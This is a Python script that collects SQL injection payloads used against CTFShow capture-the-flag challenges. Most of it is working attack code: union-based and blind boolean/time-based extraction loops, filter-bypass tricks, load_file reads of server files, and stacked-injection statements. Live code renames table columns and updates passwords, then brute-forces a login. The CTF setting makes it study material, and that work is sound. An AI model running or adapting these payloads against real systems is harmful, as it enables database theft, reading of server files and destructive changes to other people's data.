import requests
import time
s = requests.session()  # NOTE(review): never used below — every probe calls requests.post() directly, so no cookies are carried between requests
# Whitespace substitutes: %09, %0c; comment marker: %23 (#)
# substr(string, start, length): string is the input, start the 1-based start offset, length the number of characters to take.
# e.g. ?id='or(mid(username,1,1)='f')and'1'='1
# MID(column_name, start[, length]): column_name — required, the field to extract from; start — required, starting position (1-based); length — optional, number of characters to return; when omitted MID() returns the rest of the text.
# left(string, n): string is the input, n the number of leading characters to keep.
#--------------------------------------------------------------
# Default (nothing filtered) — union-based enumeration:
#1' or 1=1 --+
#1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
#1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+
#1' union select id,username,password from ctfshow_user --+
# to_base64(username): encode the column so its value slips past a regex check on the output
#--------------------------------------------------------------
# Challenge endpoint; every payload below is POSTed here as form data.
url = "http://03b68bbd-6cd9-4c07-871a-2c73ac3c7b9b.challenge.ctf.show:8080/api/"
# POST body: `username` carries the injected SQL, `password` is the value the
# server compares with the first column of its query result (see the PHP
# snippet quoted at the end of this file).
data = dict(username="", password=1)
# Flag recovered so far; pre-seed it (e.g. "ctfshow") to skip known positions.
flag = ""
# Candidate alphabet for the byte-by-byte oracle: [0-9a-z] plus "{", "}" and "-".
# A wider alphabet, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-=_",
# was used for some of the other challenges.
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-"
#--------------------------------------------------------------
# Bypass for a filter on [0-9]: spell an integer as true+true+... (MySQL evaluates `true` as 1)
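def trueNum(n):
    """Spell the integer ``n`` without digits, as ``true+true+...``.

    Used when the target filters ``[0-9]``: MySQL evaluates ``true`` as 1, so
    ``n`` copies joined with ``+`` sum to ``n`` inside the injected expression.

    Args:
        n: the integer to encode; must be >= 0.

    Returns:
        ``"true"`` for 1, ``"true+true"`` for 2, and so on. For 0 the result
        is ``"false"`` (the original returned ``"true"``, which evaluates to 1).

    Raises:
        ValueError: if ``n`` is negative — there is no digit-free spelling
        with this scheme, and silently returning ``"true"`` would be wrong.
    """
    if n < 0:
        raise ValueError(f"cannot encode negative value {n!r} as true+true+...")
    if n == 0:
        # MySQL evaluates ``false`` as 0 and it contains no digit either.
        return "false"
    return "+".join(["true"] * n)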
#--------------------------------------------------------------
# Binary-search the offset of the flag marker inside index.php with locate()
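def getIndex(needle="ctfshow", path="/var/www/html/api/index.php", hi=300):
    """Binary-search the 1-based offset of ``needle`` in ``path`` on the server.

    Each probe injects ``if(locate(needle, load_file(path)) > mid, 0, 1)`` as
    the username. When the offset exceeds ``mid`` the query yields 0, the
    submitted password (still the initial 1 from ``data``) does not match and
    the reply contains "密码错误", so the search moves up; otherwise it moves
    down. ``load_file`` presumably returns NULL when the DB user may not read
    files, in which case every probe lands in the "move down" branch — verify
    the result with getFlag().

    Args:
        needle: substring to locate (default "ctfshow", the flag prefix).
        path: server-side file read through ``load_file``.
        hi: upper bound of the search range; raise it if the needle may sit
            beyond byte 300.

    Returns:
        The 1-based offset of ``needle``. ``locate`` returns 0 when the
        needle is absent, which this search cannot tell apart from offset 1.
    """
    lo = 1
    while lo < hi:
        mid = (lo + hi) >> 1
        data["username"] = "if(locate('{0}',load_file('{1}'))>{2},0,1)".format(
            needle, path, mid
        )
        res = requests.post(url, data=data)
        if "密码错误" in res.json()["msg"]:
            lo = mid + 1  # offset > mid
        else:
            hi = mid  # offset <= mid
    # The original returned ``mid``, which is one short whenever the final
    # step moved ``lo`` up; the converged bound is the answer.
    return lo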
#--------------------------------------------------------------
# Read the FLAG byte by byte (the run sometimes errors out — restart it when that happens)
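def getFlag(num, length=45, charset=None):
    """Dump ``length`` bytes of index.php following offset ``num``, one byte at a time.

    For each position the username becomes
    ``if(ascii(substr(load_file(...), pos, 1)) != ord(c), 0, 1)``: only the
    matching candidate makes the query return 1, which equals the submitted
    password (the initial 1 from ``data``) and yields a reply without
    "密码错误".

    Args:
        num: offset from getIndex(); reading starts at ``num + 1``.
            NOTE(review): the byte at ``num`` itself is skipped — confirm
            that is intended given what getIndex() returns.
        length: number of positions to read (the original read 45).
        charset: candidate characters tried per position; defaults to
            [0-9a-z{}-].

    Returns:
        The recovered string. A position matched by no candidate is recorded
        as "?" so later positions stay aligned (the original silently skipped
        it, shifting everything after it left by one).
    """
    if charset is None:
        charset = "0123456789abcdefghijklmnopqrstuvwxyz{}-"
    recovered = ""
    for pos in range(int(num) + 1, int(num) + 1 + length):
        for cand in charset:
            data["username"] = (
                'if(ascii(substr(load_file("/var/www/html/api/index.php"),%d,1))!=%d,0,1)'
                % (pos, ord(cand))
            )
            res = requests.post(url, data=data)
            # Substring test rather than equality, so a message that merely
            # contains the failure marker is not mistaken for a hit.
            if "密码错误" not in res.json()["msg"]:
                recovered += cand
                break
        else:
            recovered += "?"
        print(recovered)
    return recovered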
#getFlag(getIndex())
#--------------------------------------------------------------
#for i in range(1,100):
#for i in range(1,46):
# for j in dirt:
# x = ord(j)
# y = ascii(j)
# first = 32
# tail = 127
# while first < tail:
# mid = (first + tail) >> 1
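# ---------------------------------------------------------------------------
# Payload reference kept from the original script (one variant was active per
# challenge; `i` is the character position, `j` the candidate character,
# `mid` the binary-search probe on the byte value).
# GET, boolean-based blind:
#   payload = '''1' and substr((select password from ctfshow_user4 where username = "flag"),{},1)="{}"--+'''.format(i,j)
# GET, time-based blind (a hit is a reply that takes >= 3 s):
#   payload = '''1' and if(substr((select password from ctfshow_user5 where username = "flag"),{},1)="{}",sleep(3),0)--+'''.format(i,j)
#   payload = (url+payload)
#   res = requests.get(payload)
# POST, known prefix flag = "ctf", range(3,46), success marker `$user_count = 1;`:
#   data['tableName'] = "(ctfshow_user)where(left(pass,{}))like'{}'".format(i,flag+j)
# Server-side filter for the next two variants:
#   preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
# POST, known prefix flag = "ctfshow", range(8,46), success marker `$user_count = 43;`:
#   data['tableName'] = f"ctfshow_user as x right join ctfshow_user as y on (substr(y.pass,{i},1)regexp(char()))"
# Same with [0-9] filtered (numbers spelled via trueNum):
#   data['tableName'] = f"ctfshow_user as x right join ctfshow_user as y on (substr(y.pass,{trueNum(i)},{trueNum(1)})regexp(char({trueNum(x)})))"
# POST, boolean blind with a binary search on the byte value:
#   data['username'] = f"admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid},1,2)=1#"
#   data['username'] = f"admin' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{i},1))>{mid},1,2)=1#"
#   data['username'] = f"admin' and if(ascii(substr((select concat(f1ag) from ctfshow_fl0g),{i},1))>{mid},1,2)=1#"
# ascii filtered:
#   data['username'] = f"admin' and if(ord(substr((select concat(f1ag) from ctfshow_fl0g),{i},1))>{mid},1,2)=1#"
# ascii, ord and hex filtered:
#   data['username'] = f"admin' and if(substr((select concat(f1ag) from ctfshow_fl0g),{i},1)regexp('{j}'),1,2)=1#"
# substr filtered:
#   data['username'] = f"admin' and if((select concat(f1ag) from ctfshow_flxg) like '{flag + j + '%'}',1,0)#"
# ---------------------------------------------------------------------------

# Active challenge. Filter:
#   '/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set//i'
# Neither ";" nor "alter" is blocked and the username value evidently reaches
# the query unquoted, so extra statements can be stacked after a dummy "0".
# The login handler compares the first column of its result with the
# submitted password (see the PHP snippet quoted at the end of this file);
# renaming `pass` -> `ppp`, `id` -> `pass`, `ppp` -> `id` makes that
# comparison run against the original id, which a small counter brute-forces.
SWAP_COLUMNS = (
    "0;alter table ctfshow_user change column `pass` `ppp` varchar(255);"
    "alter table ctfshow_user change column `id` `pass` varchar(255);"
    "alter table ctfshow_user change column `ppp` `id` varchar(255);"
)

# Run the swap ONCE. The three renames are a pure exchange, so re-sending
# them on every iteration (as the original loop did) flips the schema back on
# every odd iteration and those guesses are compared against the real
# password instead of the id.
data["username"] = SWAP_COLUMNS
data["password"] = "0"
requests.post(url, data=data)
print(SWAP_COLUMNS)

# Brute-force the exposed id; "登陆成功" in the reply means the guess matched.
for i in range(100):
    data["username"] = "0"
    data["password"] = f"{i}"
    res = requests.post(url, data=data)
    if "登陆成功" in res.json()["msg"]:
        print(res.text)
        break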
# if 'admin' in res.text:
# if '$user_count = 43;' in res.text:
# if (b-a) >= 3:
# if "密码错误" in res.json()['msg']:
# if "登陆成功" in res.json()['msg']:
# print(res.text)
# first = mid + 1
# else:
# tail = mid
# flag = flag + chr(first)
# print(flag)
# flag += j
# print('(flag) ===== ',flag)
# break
#--------------------------------------------------------------
# Stacked injection
# Close the previous statement with ";" and append a new one so both run in the same query. The examples below are username values that were used:
#0;update`ctfshow_user`set`pass`=1
#username=0;select(1) password=1
# if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop|\(/i', $username)){
# $ret['msg']='用户名非法';
# die(json_encode($ret));
# }
#
# if($row[0]==$password){
# $ret['msg']="登陆成功 flag is $flag";
# }
# With username `0;show tables;` the query returns the table names, so a password of `ctfshow_user` satisfies `$row[0]==$password` and the flag is printed.
Python------CtfShow的sql脚本合集